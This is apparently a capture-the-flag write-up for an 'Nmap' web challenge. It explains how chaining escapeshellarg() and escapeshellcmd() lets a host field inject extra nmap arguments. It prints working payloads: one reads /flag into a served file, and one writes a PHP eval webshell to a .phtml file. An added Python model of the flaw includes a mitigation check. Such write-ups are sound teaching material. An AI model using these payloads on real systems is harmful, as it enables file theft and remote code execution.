
[朱雀组]Nmap

Let's look at the source.

index.php:

```php
<?php
require('settings.php');
set_time_limit(0);
if (isset($_POST['host'])):
    if (!defined('WEB_SCANS')) {
        die('Web scans disabled');
    }
    $host = $_POST['host'];
    // The only input filter: reject any host containing "php" (case-insensitive)
    if (stripos($host, 'php') !== false) {
        die("Hacker...");
    }
    // escapeshellarg() followed by escapeshellcmd(): chaining the two is the weak point
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $filename = substr(md5(time() . rand(1, 10)), 0, 5);
    $command = "nmap " . NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
    $result_scan = shell_exec($command);
    if (is_null($result_scan)) {
        die('Something went wrong');
    } else {
        header('Location: result.php?f=' . $filename);
    }
else:
?>
<!-- the HTML scan form follows here in the original (not reproduced on this page) -->
<?php endif; ?>
```
settings.php:

```php
<?php
# Path where all result files are stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readable/writable for the web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');
# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');
# Comment this line to disable web scans
define('WEB_SCANS', 'enable');
# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');
# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');
?>
```
The key statements:

```php
$command = "nmap " . NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
```

After substituting the constants, the executed command is equivalent to:

```shell
$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host
```
Method 1: read the flag directly and write it to a file
  • -iL: load the target list from a file
  • -oN: write the scan output in "Normal" format to the given file

```
' -iL /flag -oN flag.txt '
```

Then visit flag.txt.

Method 2: one-line webshell, bypassing the "php" filter (the .phtml extension never contains the string "php")

```
'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '
```
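To see why both payloads above survive escapeshellarg() plus escapeshellcmd(), here is an added Python model (not part of the writeup or the challenge code) that re-implements the two PHP functions, chains them the way index.php does, and shell-splits the result; `is_safe_host()` is an added mitigation suggestion, and the host strings in it are constructed samples.

```python
import re
import shlex

# Model of PHP's escapeshellarg() on Linux: wrap in single quotes and turn every
# embedded ' into '\'' so the shell should see one literal word.
def php_escapeshellarg(s: str) -> str:
    return "'" + s.replace("'", "'\\''") + "'"

# Model of PHP's escapeshellcmd(): backslash-escape shell metacharacters, but a
# ' or " is escaped only when it has no later partner (pairs are left alone).
def php_escapeshellcmd(s: str) -> str:
    meta = set('#&;`|*?~<>^()[]{}$\\\n\xff')
    out = []
    partner = None              # index of the quote expected to close the open pair
    for i, c in enumerate(s):
        if c in ("'", '"'):
            nxt = s.find(c, i + 1) if partner is None else -1
            if partner is None and nxt != -1:
                partner = nxt   # opening quote of a pair: kept as-is
            elif partner == i:
                partner = None  # closing quote of the pair: kept as-is
            else:
                out.append('\\')  # unpaired quote: escaped
        elif c in meta:
            out.append('\\')
        out.append(c)
    return ''.join(out)

# index.php does exactly this: escapeshellarg() first, then escapeshellcmd().
def escaped_host(host: str) -> str:
    return php_escapeshellcmd(php_escapeshellarg(host))

# Shell word-splitting of the escaped host: a genuine host yields one token, but
# the '\'' sequences become backslash-escaped quote pairs that close the quoting,
# so everything between them is parsed as extra nmap arguments.
def host_argv(host: str) -> list:
    return shlex.split(escaped_host(host))

# Mitigation (added suggestion): allow-list hostname/IPv4 characters and insist the
# escaped host still expands to exactly one argv token.
HOST_RE = re.compile(r'^[A-Za-z0-9.-]{1,253}$')

def is_safe_host(host: str) -> bool:
    return bool(HOST_RE.fullmatch(host)) and host_argv(host) == [host]

if __name__ == '__main__':
    for h in ('scanme.nmap.org', "' -iL /flag -oN flag.txt '"):
        print(repr(h), '->', host_argv(h), 'ok' if is_safe_host(h) else 'REJECT')
```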